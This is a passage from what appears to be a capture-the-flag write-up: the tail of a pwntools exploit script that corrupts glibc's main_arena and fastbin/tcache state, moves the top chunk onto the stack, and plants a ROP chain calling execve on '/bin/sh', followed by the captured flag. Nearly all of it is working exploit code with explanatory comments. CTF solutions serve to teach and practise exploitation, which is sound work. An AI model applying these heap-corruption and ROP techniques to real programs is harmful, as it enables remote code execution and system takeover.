    main_arena += p64(libc.sym.main_arena + 256+i)*2
i = malloc(0x800, main_arena)

# check that the full overwrite has been done
# (when running this remotely, I initially had issues with this)
assert len(view(i)) == len(main_arena)

### 10. use fastbin[0x70] to store a fake size for tcache

# (this needs to be done late on to prevent largebin complications)
for i in chunk70:
    free(i)
malloc(0x28, flat(0, 0x71, protect(0x31, heap+0x1000)))

# empty tcache[0x70]
tcache = TcachePerthreadStruct()
tcache.set(0x30, libc.sym.main_arena+64)
t = malloc(0x288, bytes(tcache))

# write fake size to fastbin array
malloc(0x68)

### 11. allocate using fake size to overwrite av->top to the stack

# we use a PIE address located after the canary in alloc_chunk()
# this is a valid top chunk size as main_arena->system_mem is a heap address
# and thus is larger
target = stack_leak-0x180
malloc(0x28, p64(0)*4 + p64(target))

### 12. allocate on stack to get ROP

rop = ROP(libc)
rop.raw(0)  # rbp
rop.execve(next(libc.search(b"/bin/sh\x00")), 0, 0)

# use a smallbin sized chunk to prevent triggering a malloc_consolidate()
# as we have invalid chunks in the fastbin array
malloc(0x300, b"A"*8 + rop.chain())

print(current_index)
p.interactive()

dice{without_love..._'the_flag'_cannot_be_seen...!}

Previousr2uwu2s-resort

Last updated 4 months ago

Was this helpful?